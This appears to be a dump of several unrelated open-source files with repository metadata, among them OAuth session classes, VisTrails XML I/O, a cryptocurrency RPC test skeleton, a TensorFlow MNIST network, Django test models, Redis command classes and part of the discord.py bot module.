res = {"access_token": self.token['oauth_token'],
"access_secret": self.token['oauth_token_secret']}
return json.dumps(res)
def get_request_url(self, **kwargs):
if not self.token:
self.token = self.fetch_request_token(self.request_token_uri)
else:
kwargs['request_token'] = self.token
authorization_url = self.authorization_url(self.authorization_uri, **kwargs)
return authorization_url
def get_access_token(self, verifier="", **kwargs):
self.token = self.fetch_access_token(self.access_token_uri, verifier, **kwargs)
return self.token
class AuthOAuth2(OAuth2Session):
def __init__(self, client_id, client_secret, redirect_uri,
authorization_uri, access_token_uri,
access_token=None, **kwargs):
super(AuthOAuth2, self).__init__(client_id=client_id, token=access_token,
redirect_uri=redirect_uri, **kwargs)
self.callback_uri = redirect_uri
self.client_secret = client_secret
self.authorization_uri = authorization_uri
self.access_token_uri = access_token_uri
if access_token:
self.token = access_token
def get_request_url(self, **kwargs):
request_url, state = self.authorization_url(self.authorization_uri, **kwargs)
return request_url
def get_access_token(self, response_url, **kwargs):
self.token = self.fetch_token(self.access_token_uri,
client_secret=self.client_secret,
authorization_response=response_url,
**kwargs)
return self.token
| {
"content_hash": "b0b30934305abb5247ae81ba95676c55",
"timestamp": "",
"source": "github",
"line_count": 203,
"max_line_length": 110,
"avg_line_length": 36.98522167487685,
"alnum_prop": 0.5610015982951518,
"repo_name": "raptorz/pyfan",
"id": "2b1f8b5778c354ed8f15a35c051dc27d263c55fb",
"size": "7532",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "restclient/restclient.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "28174"
}
],
"symlink_target": ""
} |
from xml.parsers.expat import ExpatError
import xml.dom.minidom
from vistrails.db import VistrailsDBException
from vistrails.db.versions.v0_5_0 import version as my_version
def parse_xml_file(filename):
try:
return xml.dom.minidom.parse(filename)
except xml.parsers.expat.ExpatError, e:
msg = 'XML parse error at line %s, col %s: %s' % \
(e.lineno, e.offset, e.code)
raise VistrailsDBException(msg)
def write_xml_file(filename, dom, prettyprint=True):
output = open(filename, 'w')
if prettyprint:
dom.writexml(output, '',' ','\n')
else:
dom.writexml(output)
output.close()
def read_xml_object(vtType, node, dao_list):
return dao_list[vtType].fromXML(node)
def write_xml_object(obj, dom, dao_list, node=None):
res_node = dao_list[obj.vtType].toXML(obj, dom, node)
return res_node
def open_from_xml(filename, vtType, dao_list):
"""open_from_xml(filename) -> DBVistrail"""
dom = parse_xml_file(filename)
vistrail = read_xml_object(vtType, dom.documentElement, dao_list)
dom.unlink()
return vistrail
def save_to_xml(obj, filename, dao_list):
dom = xml.dom.minidom.getDOMImplementation().createDocument(None, None,
None)
root = write_xml_object(obj, dom, dao_list)
dom.appendChild(root)
if obj.vtType == 'vistrail':
root.setAttribute('version', my_version)
root.setAttribute('xmlns:xsi',
'http://www.w3.org/2001/XMLSchema-instance')
root.setAttribute('xsi:schemaLocation',
'http://www.vistrails.org/vistrail.xsd')
write_xml_file(filename, dom)
dom.unlink()
def serialize(object, dao_list):
dom = xml.dom.minidom.getDOMImplementation().createDocument(None, None,
None)
root = write_xml_object(object, dom, dao_list)
dom.appendChild(root)
return dom.toxml()
def unserialize(str, obj_type, dao_list):
dom = xml.dom.minidom.parseString(str)
return read_xml_object(obj_type, dom.documentElement, dao_list)
| {
"content_hash": "550d64a86b2aa50e2c52961b1be6cb2e",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 75,
"avg_line_length": 35.39344262295082,
"alnum_prop": 0.6252894858730894,
"repo_name": "Nikea/VisTrails",
"id": "661d93790f5c5ed94663c4da88d09441f847aa7f",
"size": "4039",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "vistrails/db/versions/v0_5_0/persistence/xml/io.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1421"
},
{
"name": "Inno Setup",
"bytes": "19611"
},
{
"name": "Makefile",
"bytes": "768"
},
{
"name": "Mako",
"bytes": "66415"
},
{
"name": "PHP",
"bytes": "49038"
},
{
"name": "Python",
"bytes": "19674395"
},
{
"name": "R",
"bytes": "778864"
},
{
"name": "Rebol",
"bytes": "3972"
},
{
"name": "Shell",
"bytes": "34182"
},
{
"name": "TeX",
"bytes": "145219"
},
{
"name": "XSLT",
"bytes": "1090"
}
],
"symlink_target": ""
} |
import os
import sys
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "python-bitsendrpc"))
import json
import shutil
import subprocess
import tempfile
import traceback
from bitsendrpc.authproxy import AuthServiceProxy, JSONRPCException
from util import *
def run_test(nodes):
# Replace this as appropriate
for node in nodes:
assert_equal(node.getblockcount(), 200)
assert_equal(node.getbalance(), 25*50)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--nocleanup", dest="nocleanup", default=False, action="store_true",
help="Leave bitsendds and test.* datadir on exit or error")
parser.add_option("--srcdir", dest="srcdir", default="../../src",
help="Source directory containing bitsendd/bitsend-cli (default: %default%)")
parser.add_option("--tmpdir", dest="tmpdir", default=tempfile.mkdtemp(prefix="test"),
help="Root directory for datadirs")
(options, args) = parser.parse_args()
os.environ['PATH'] = options.srcdir+":"+os.environ['PATH']
check_json_precision()
success = False
nodes = []
try:
print("Initializing test directory "+options.tmpdir)
if not os.path.isdir(options.tmpdir):
os.makedirs(options.tmpdir)
initialize_chain(options.tmpdir)
nodes = start_nodes(2, options.tmpdir)
connect_nodes(nodes[1], 0)
sync_blocks(nodes)
run_test(nodes)
success = True
except AssertionError as e:
print("Assertion failed: "+e.message)
except Exception as e:
print("Unexpected exception caught during testing: "+str(e))
traceback.print_tb(sys.exc_info()[2])
if not options.nocleanup:
print("Cleaning up")
stop_nodes(nodes)
wait_bitsendds()
shutil.rmtree(options.tmpdir)
if success:
print("Tests successful")
sys.exit(0)
else:
print("Failed")
sys.exit(1)
if __name__ == '__main__':
main()
| {
"content_hash": "9b5c420b60ca4824478fb9c7dff3d04a",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 99,
"avg_line_length": 28.794520547945204,
"alnum_prop": 0.6294005708848716,
"repo_name": "madzebra/BitSend",
"id": "3a5d234bfa3237b87ad06c430dd2d1c046738303",
"size": "2426",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "qa/rpc-tests/skeleton.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "36095"
},
{
"name": "C",
"bytes": "4046688"
},
{
"name": "C++",
"bytes": "5810551"
},
{
"name": "CSS",
"bytes": "68816"
},
{
"name": "HTML",
"bytes": "50622"
},
{
"name": "Java",
"bytes": "30290"
},
{
"name": "M4",
"bytes": "277388"
},
{
"name": "Makefile",
"bytes": "114046"
},
{
"name": "Objective-C",
"bytes": "7725"
},
{
"name": "Objective-C++",
"bytes": "7240"
},
{
"name": "Protocol Buffer",
"bytes": "2328"
},
{
"name": "Python",
"bytes": "1202074"
},
{
"name": "QMake",
"bytes": "13495"
},
{
"name": "Roff",
"bytes": "18118"
},
{
"name": "Shell",
"bytes": "415657"
}
],
"symlink_target": ""
} |
import unittest
import os
from mock import Mock, MagicMock
from link.utils import load_json_file
from link.common import APIObject
TESTS_DIR = os.path.dirname(__file__)
def tst_file_path(file_name):
return '%s/%s' % (TESTS_DIR, file_name)
def tst_config_path(config_name):
return '%s/config/%s' % (TESTS_DIR, config_name)
def tst_db_path(config_name):
return '%s/dbs/%s' % (TESTS_DIR, config_name)
def load_tst_config(config_name):
config_path = tst_config_path(config_name)
return load_json_file(config_path)
class LnkAPITest(unittest.TestCase):
"""
Has helper functions for making expected return values
"""
def setUp(self):
pass
#TODO: Make sure we have other tests to test the APIObject
def expected(self, message_data=None):
api_object = APIObject()
api_object.set_message(message_data)
return api_object.response
| {
"content_hash": "91c223ac97a389c38c65fb481f58cad1",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 62,
"avg_line_length": 26.676470588235293,
"alnum_prop": 0.6802646085997794,
"repo_name": "uhjish/link",
"id": "c92fd9904e5fb78f349c70afc7596e2aa5b8af27",
"size": "907",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "link/tests/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "140701"
},
{
"name": "VimL",
"bytes": "883"
}
],
"symlink_target": ""
} |
"""
KFServing
Python SDK for KFServing # noqa: E501
The version of the OpenAPI document: v0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kfserving.configuration import Configuration
class V1beta1TransformersConfig(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'feast': 'V1beta1TransformerConfig'
}
attribute_map = {
'feast': 'feast'
}
def __init__(self, feast=None, local_vars_configuration=None): # noqa: E501
"""V1beta1TransformersConfig - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._feast = None
self.discriminator = None
if feast is not None:
self.feast = feast
@property
def feast(self):
"""Gets the feast of this V1beta1TransformersConfig. # noqa: E501
:return: The feast of this V1beta1TransformersConfig. # noqa: E501
:rtype: V1beta1TransformerConfig
"""
return self._feast
@feast.setter
def feast(self, feast):
"""Sets the feast of this V1beta1TransformersConfig.
:param feast: The feast of this V1beta1TransformersConfig. # noqa: E501
:type: V1beta1TransformerConfig
"""
self._feast = feast
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1beta1TransformersConfig):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1beta1TransformersConfig):
return True
return self.to_dict() != other.to_dict()
| {
"content_hash": "b7479c36af5364a6190313a39f29cc93",
"timestamp": "",
"source": "github",
"line_count": 118,
"max_line_length": 82,
"avg_line_length": 28.296610169491526,
"alnum_prop": 0.5693321353698713,
"repo_name": "kubeflow/kfserving-lts",
"id": "d816297a3d2952bbc5302a5fcf322605abc559d5",
"size": "3933",
"binary": false,
"copies": "1",
"ref": "refs/heads/release-0.6",
"path": "python/kfserving/kfserving/models/v1beta1_transformers_config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "224"
},
{
"name": "Dockerfile",
"bytes": "10549"
},
{
"name": "Go",
"bytes": "1251102"
},
{
"name": "HTML",
"bytes": "17922"
},
{
"name": "JavaScript",
"bytes": "1828"
},
{
"name": "Jsonnet",
"bytes": "2434415"
},
{
"name": "Makefile",
"bytes": "16071"
},
{
"name": "Python",
"bytes": "1860674"
},
{
"name": "SCSS",
"bytes": "1789"
},
{
"name": "Shell",
"bytes": "36788"
},
{
"name": "TypeScript",
"bytes": "78886"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import argparse
import sys
import tempfile
from tensorflow.examples.tutorials.mnist import input_data
FLAGS = None
##
# @brief generate variables by given shape
#
# @param shape:weights shape
#
# @return weights
def weights_variables(shape):
weights = tf.Variable(tf.truncated_normal(
shape=shape, stddev=0.1))
return weights
##
# @brief return bais
#
# @param shape:bais shape
#
# @return bais
def basi_variables(shape):
bais = tf.Variable(tf.zeros(shape))
return bais
##
# @brief
#
# @param x: input image
# @param w: conv variables
#
# @return conv result tensor
def conv2d(x, w):
return tf.nn.conv2d(x, w, strides=[1, 1, 1, 1], padding='SAME')
##
# @brief pooling function
#
# @param x: input images
#
# @return: pooling result tensor
def max_pooling_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME')
##
# @brief build a deep network
#
# @param x: mnist input pixels
#
# @return
def deep_network(x):
with tf.name_scope('reshape'):
# reshape input x, first dim is -1, it means the first dim will be
# computed, last dim represent colorful image's channel
x_image = tf.reshape(x, [-1, 28, 28, 1])
# first conv operation
with tf.name_scope('conv1'):
W_conv1 = weights_variables([5, 5, 1, 32])
b_conv1 = basi_variables([32])
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
# pooling layer
with tf.name_scope('pooling1'):
h_pool1 = max_pooling_2x2(h_conv1)
# second conv operation
with tf.name_scope('conv2'):
W_conv2 = weights_variables([5, 5, 32, 64])
b_conv2 = basi_variables([64])
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
# pooling layer
with tf.name_scope('pooling2'):
h_pool2 = max_pooling_2x2(h_conv2)
# first full connect layer
with tf.name_scope('fc1'):
W_fc1 = weights_variables([7 * 7 * 64, 1024])
b_fc1 = basi_variables([1024])
h_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * 64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
# dropout
with tf.name_scope('dropout'):
keep_prob = tf.placeholder(tf.float32)
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
# second full layer
with tf.name_scope('fc2'):
W_fc2 = weights_variables([1024, 10])
b_fc2 = basi_variables([10])
y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
return y_conv, keep_prob
##
# @brief main function
#
# @return
def main(_):  # tf.app.run() passes argv through, hence the unused parameter
    mnist = input_data.read_data_sets(FLAGS.data_dir, one_hot=True)
x = tf.placeholder(tf.float32, [None, 784])
y_ = tf.placeholder(tf.float32, [None, 10])
y_conv, prob = deep_network(x)
with tf.name_scope('loss'):
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=y_,
logits=y_conv)
cross_entropy = tf.reduce_mean(cross_entropy)
with tf.name_scope('adam_optimizer'):
        train_step = tf.train.AdamOptimizer(0.0001).minimize(cross_entropy)
with tf.name_scope('accuracy'):
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
correct_prediction = tf.cast(correct_prediction, tf.float32)
accuracy = tf.reduce_mean(correct_prediction)
    graph_location = tempfile.mkdtemp()  # FileWriter needs a directory path
print('saving graph %s' % graph_location)
train_writer = tf.summary.FileWriter(graph_location)
train_writer.add_graph(tf.get_default_graph())
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for i in range(20000):
batch = mnist.train.next_batch(50)
if i % 100 == 0:
train_accuracy = accuracy.eval(feed_dict={x: batch[0],
y_: batch[1],
prob: 1.0})
print('step %d, training accuracy %g' % (i, train_accuracy))
train_step.run(feed_dict={x: batch[0],
y_: batch[1],
prob: 0.5})
print('test accuracy: %g' %
accuracy.eval(feed_dict={x: mnist.test.images,
y_: mnist.test.labels,
prob: 1.0}))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir',
type=str,
default='/home/viekie/mnist/input_data',
help='mnist data dir')
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| {
"content_hash": "b186f3a91f96d5035f66874655ffd36a",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 78,
"avg_line_length": 31.529032258064515,
"alnum_prop": 0.570902394106814,
"repo_name": "viekie/tensorflow-tutorial",
"id": "b3fb1f4b198b8117f248eabe074de90c52ae6149",
"size": "5092",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "chap04/mnist_deep.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "140354"
}
],
"symlink_target": ""
} |
from django.db import models
from django_countries.fields import CountryField
from django_countries.tests import custom_countries
class Person(models.Model):
name = models.CharField(max_length=50)
country = CountryField()
other_country = CountryField(
blank=True, countries_flag_url="//flags.example.com/{code}.gif"
)
str_attr_country = CountryField(blank=True, countries_str_attr="name")
favourite_country = CountryField(default="NZ")
fantasy_country = CountryField(
countries=custom_countries.FantasyCountries, blank=True
)
class Meta:
ordering = ("name",)
class AllowNull(models.Model):
country = CountryField(null=True, blank=True, blank_label="(select country)")
class MultiCountry(models.Model):
countries = CountryField(multiple=True)
unsorted_countries = CountryField(multiple=True, multiple_sort=False, blank=True)
duplicate_countries = CountryField(multiple=True, multiple_unique=False, blank=True)
unsorted_duplicate_countries = CountryField(
multiple=True, multiple_sort=False, multiple_unique=False, blank=True
)
uneditable_countries = CountryField(multiple=True, editable=False)
class WithProp(models.Model):
country = CountryField()
_private_field = models.CharField(max_length=10)
@property
def public_field(self):
return self._private_field
@public_field.setter
def public_field(self, value):
self._private_field = value
| {
"content_hash": "0a1f9552f3cfc5376fdd6de743275a81",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 88,
"avg_line_length": 31.617021276595743,
"alnum_prop": 0.7166890982503364,
"repo_name": "SmileyChris/django-countries",
"id": "ca2dcabfaad0be3b058bdd98488d528d88fdd9bf",
"size": "1486",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_countries/tests/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "11991"
},
{
"name": "Python",
"bytes": "141477"
}
],
"symlink_target": ""
} |
from functools import reduce  # used by AbstractCommand.__str__ (reduce moved to functools in Python 3)
class CommandTrait(object):
def get_id(self):
pass
def set_hash(self):
pass
def get_hash(self):
pass
def set_arguments(self, arguments):
pass
def set_raw_arguments(self, arguments):
pass
def get_arguments(self):
pass
def get_argument(self, index):
pass
def parse_response(self, data):
pass
class AbstractCommand(CommandTrait):
    def filter_arguments(self, arguments):
        return arguments
    def set_arguments(self, arguments):
        self.arguments = self.filter_arguments(arguments)
def set_raw_arguments(self, arguments):
self.arguments = arguments
def get_arguments(self):
return self.arguments
def get_argument(self, index):
        if index < len(self.arguments):
return self.arguments[index]
def get_hash(self):
if hasattr(self, 'hash'):
return self.hash
def parse_response(self, data):
return data
def to_string_argument_reducer(self, accumulator, argument):
if len(argument) > 32:
argument = argument[:32] + '[...]'
accumulator += ' ' + argument
return accumulator
    def __str__(self):
        # Fold the arguments onto the command id, e.g. "SET mykey myvalue".
        return reduce(
            self.to_string_argument_reducer,
            self.get_arguments(),
            self.get_id())
def normalize_variadic(self, arguments):
        # Flatten ("key", [v1, v2, ...]) into ["key", v1, v2, ...].
        if len(arguments) == 2 and isinstance(arguments[1], (list, tuple)):
            return [arguments[0]] + list(arguments[1])
return arguments
class ConnectionAuth(AbstractCommand):
def get_id(self):
return 'AUTH'
class ConnectionEcho(AbstractCommand):
def get_id(self):
return 'ECHO'
class ConnectionPing(AbstractCommand):
def get_id(self):
return 'PING'
def parse_response(self, data):
return data == 'PONG'
class ConnectionQuit(AbstractCommand):
def get_id(self):
return 'QUIT'
class ConnectionSelect(AbstractCommand):
def get_id(self):
return 'SELECT'
class HashDelete(AbstractCommand):
def get_id(self):
return 'HDEL'
    def filter_arguments(self, arguments):
return self.normalize_variadic(arguments)
class HashExists(AbstractCommand):
def get_id(self):
return 'HEXISTS'
def parse_response(self, data):
return bool(data)
class HashGet(AbstractCommand):
def get_id(self):
return 'HGET'
class HashGetAll(AbstractCommand):
def get_id(self):
return 'HGETALL'
    def parse_response(self, data):
        # Redis replies with a flat [field1, value1, field2, value2, ...] list;
        # fold it into a dict.
        result = {}
        for i in range(0, len(data), 2):
            result[data[i]] = data[i + 1]
        return result
class HashGetMultiple(AbstractCommand):
def get_id(self):
return 'HMGET'
    def filter_arguments(self, arguments):
return self.normalize_variadic(arguments)
class HashIncrementBy(AbstractCommand):
def get_id(self):
return 'HINCRBY'
class HashIncrementByFloat(AbstractCommand):
def get_id(self):
        return 'HINCRBYFLOAT'
class StringGet(AbstractCommand):
def get_id(self):
return 'GET'
class StringSet(AbstractCommand):
def get_id(self):
return 'SET'
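if __name__ == "__main__":
    # Small illustrative smoke test, not part of the original module: build a
    # command the way a client would and exercise response parsing.
    cmd = StringSet()
    cmd.set_arguments(["mykey", "myvalue"])
    print("%s %r" % (cmd.get_id(), cmd.get_arguments()))   # SET ['mykey', 'myvalue']
    getall = HashGetAll()
    print("%r" % getall.parse_response(["f1", "v1", "f2", "v2"]))   # {'f1': 'v1', 'f2': 'v2'}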
| {
"content_hash": "6281acaca8a286139482a872bab9a2a5",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 64,
"avg_line_length": 18.795321637426902,
"alnum_prop": 0.6120099564405725,
"repo_name": "whiteclover/redis-py",
"id": "b1bd0f730d4e05ad0fd7b0b674bf34fbe65ac8a0",
"size": "3214",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "redispy/command.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "31224"
}
],
"symlink_target": ""
} |
"""
The MIT License (MIT)
Copyright (c) 2015-2016 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import asyncio
import discord
import inspect
import importlib
import sys
import traceback
import re
from .core import GroupMixin, Command, command
from .view import StringView
from .context import Context
from .errors import CommandNotFound, CommandError
from .formatter import HelpFormatter
def _get_variable(name):
stack = inspect.stack()
try:
for frames in stack:
try:
frame = frames[0]
current_locals = frame.f_locals
if name in current_locals:
return current_locals[name]
finally:
del frame
finally:
del stack
def when_mentioned(bot, msg):
"""A callable that implements a command prefix equivalent
to being mentioned, e.g. ``@bot ``."""
server = msg.server
if server is not None:
return '{0.me.mention} '.format(server)
return '{0.user.mention} '.format(bot)
def when_mentioned_or(*prefixes):
"""A callable that implements when mentioned or other prefixes provided.
Example
--------
.. code-block:: python
bot = commands.Bot(command_prefix=commands.when_mentioned_or('!'))
See Also
----------
:func:`when_mentioned`
"""
def inner(bot, msg):
r = list(prefixes)
r.append(when_mentioned(bot, msg))
return r
return inner
_mentions_transforms = {
'@everyone': '@\u200beveryone',
'@here': '@\u200bhere'
}
_mention_pattern = re.compile('|'.join(_mentions_transforms.keys()))
@asyncio.coroutine
def _default_help_command(ctx, *commands : str):
"""Shows this message."""
bot = ctx.bot
destination = ctx.message.author if bot.pm_help else ctx.message.channel
def repl(obj):
return _mentions_transforms.get(obj.group(0), '')
# help by itself just lists our own commands.
if len(commands) == 0:
pages = bot.formatter.format_help_for(ctx, bot)
elif len(commands) == 1:
# try to see if it is a cog name
name = _mention_pattern.sub(repl, commands[0])
command = None
if name in bot.cogs:
command = bot.cogs[name]
else:
command = bot.commands.get(name)
if command is None:
yield from bot.send_message(destination, bot.command_not_found.format(name))
return
pages = bot.formatter.format_help_for(ctx, command)
else:
name = _mention_pattern.sub(repl, commands[0])
command = bot.commands.get(name)
if command is None:
yield from bot.send_message(destination, bot.command_not_found.format(name))
return
for key in commands[1:]:
try:
key = _mention_pattern.sub(repl, key)
command = command.commands.get(key)
if command is None:
yield from bot.send_message(destination, bot.command_not_found.format(key))
return
except AttributeError:
yield from bot.send_message(destination, bot.command_has_no_subcommands.format(command, key))
return
pages = bot.formatter.format_help_for(ctx, command)
if bot.pm_help is None:
characters = sum(map(lambda l: len(l), pages))
# modify destination based on length of pages.
if characters > 1000:
destination = ctx.message.author
for page in pages:
yield from bot.send_message(destination, page)
class Bot(GroupMixin, discord.Client):
"""Represents a discord bot.
This class is a subclass of :class:`discord.Client` and as a result
anything that you can do with a :class:`discord.Client` you can do with
this bot.
This class also subclasses :class:`GroupMixin` to provide the functionality
to manage commands.
Attributes
-----------
command_prefix
The command prefix is what the message content must contain initially
to have a command invoked. This prefix could either be a string to
indicate what the prefix should be, or a callable that takes in the bot
as its first parameter and :class:`discord.Message` as its second
parameter and returns the prefix. This is to facilitate "dynamic"
command prefixes. This callable can be either a regular function or
a coroutine.
The command prefix could also be a list or a tuple indicating that
multiple checks for the prefix should be used and the first one to
match will be the invocation prefix. You can get this prefix via
:attr:`Context.prefix`.
description : str
The content prefixed into the default help message.
self_bot : bool
If ``True``, the bot will only listen to commands invoked by itself rather
than ignoring itself. If ``False`` (the default) then the bot will ignore
itself. This cannot be changed once initialised.
formatter : :class:`HelpFormatter`
The formatter used to format the help message. By default, it uses a
the :class:`HelpFormatter`. Check it for more info on how to override it.
If you want to change the help command completely (add aliases, etc) then
a call to :meth:`remove_command` with 'help' as the argument would do the
trick.
pm_help : Optional[bool]
A tribool that indicates if the help command should PM the user instead of
sending it to the channel it received it from. If the boolean is set to
``True``, then all help output is PM'd. If ``False``, none of the help
output is PM'd. If ``None``, then the bot will only PM when the help
message becomes too long (dictated by more than 1000 characters).
Defaults to ``False``.
help_attrs : dict
A dictionary of options to pass in for the construction of the help command.
This allows you to change the command behaviour without actually changing
the implementation of the command. The attributes will be the same as the
ones passed in the :class:`Command` constructor. Note that ``pass_context``
will always be set to ``True`` regardless of what you pass in.
command_not_found : str
The format string used when the help command is invoked with a command that
is not found. Useful for i18n. Defaults to ``"No command called {} found."``.
The only format argument is the name of the command passed.
command_has_no_subcommands : str
The format string used when the help command is invoked with requests for a
subcommand but the command does not have any subcommands. Defaults to
``"Command {0.name} has no subcommands."``. The first format argument is the
:class:`Command` attempted to get a subcommand and the second is the name.
"""
def __init__(self, command_prefix, formatter=None, description=None, pm_help=False, **options):
super().__init__(**options)
self.command_prefix = command_prefix
self.extra_events = {}
self.cogs = {}
self.extensions = {}
self._checks = []
self.description = inspect.cleandoc(description) if description else ''
self.pm_help = pm_help
self.command_not_found = options.pop('command_not_found', 'No command called "{}" found.')
self.command_has_no_subcommands = options.pop('command_has_no_subcommands', 'Command {0.name} has no subcommands.')
self._skip_check = discord.User.__ne__ if options.pop('self_bot', False) else discord.User.__eq__
self.help_attrs = options.pop('help_attrs', {})
self.help_attrs['pass_context'] = True
if 'name' not in self.help_attrs:
self.help_attrs['name'] = 'help'
if formatter is not None:
if not isinstance(formatter, HelpFormatter):
raise discord.ClientException('Formatter must be a subclass of HelpFormatter')
self.formatter = formatter
else:
self.formatter = HelpFormatter()
# pay no mind to this ugliness.
self.command(**self.help_attrs)(_default_help_command)
# internal helpers
@asyncio.coroutine
def _get_prefix(self, message):
prefix = self.command_prefix
if callable(prefix):
ret = prefix(self, message)
if asyncio.iscoroutine(ret):
ret = yield from ret
return ret
else:
return prefix
@asyncio.coroutine
def _run_extra(self, coro, event_name, *args, **kwargs):
try:
yield from coro(*args, **kwargs)
except asyncio.CancelledError:
pass
except Exception:
try:
yield from self.on_error(event_name, *args, **kwargs)
except asyncio.CancelledError:
pass
def dispatch(self, event_name, *args, **kwargs):
super().dispatch(event_name, *args, **kwargs)
ev = 'on_' + event_name
if ev in self.extra_events:
for event in self.extra_events[ev]:
coro = self._run_extra(event, event_name, *args, **kwargs)
discord.compat.create_task(coro, loop=self.loop)
@asyncio.coroutine
def close(self):
for extension in tuple(self.extensions):
try:
self.unload_extension(extension)
except:
pass
for cog in tuple(self.cogs):
try:
self.remove_cog(cog)
except:
pass
yield from super().close()
@asyncio.coroutine
def on_command_error(self, exception, context):
"""|coro|
The default command error handler provided by the bot.
By default this prints to ``sys.stderr`` however it could be
overridden to have a different implementation.
This only fires if you do not specify any listeners for command error.
"""
if self.extra_events.get('on_command_error', None):
return
if hasattr(context.command, "on_error"):
return
print('Ignoring exception in command {}'.format(context.command), file=sys.stderr)
traceback.print_exception(type(exception), exception, exception.__traceback__, file=sys.stderr)
# utility "send_*" functions
@asyncio.coroutine
def _augmented_msg(self, coro, **kwargs):
msg = yield from coro
delete_after = kwargs.get('delete_after')
if delete_after is not None:
@asyncio.coroutine
def delete():
yield from asyncio.sleep(delete_after, loop=self.loop)
yield from self.delete_message(msg)
discord.compat.create_task(delete(), loop=self.loop)
return msg
def say(self, *args, **kwargs):
"""|coro|
A helper function that is equivalent to doing
.. code-block:: python
self.send_message(message.channel, *args, **kwargs)
The following keyword arguments are "extensions" that augment the
behaviour of the standard wrapped call.
Parameters
------------
delete_after: float
Number of seconds to wait before automatically deleting the
message.
See Also
---------
:meth:`Client.send_message`
"""
destination = _get_variable('_internal_channel')
extensions = ('delete_after',)
params = {
k: kwargs.pop(k, None) for k in extensions
}
coro = self.send_message(destination, *args, **kwargs)
return self._augmented_msg(coro, **params)
def whisper(self, *args, **kwargs):
"""|coro|
A helper function that is equivalent to doing
.. code-block:: python
self.send_message(message.author, *args, **kwargs)
The following keyword arguments are "extensions" that augment the
behaviour of the standard wrapped call.
Parameters
------------
delete_after: float
Number of seconds to wait before automatically deleting the
message.
See Also
---------
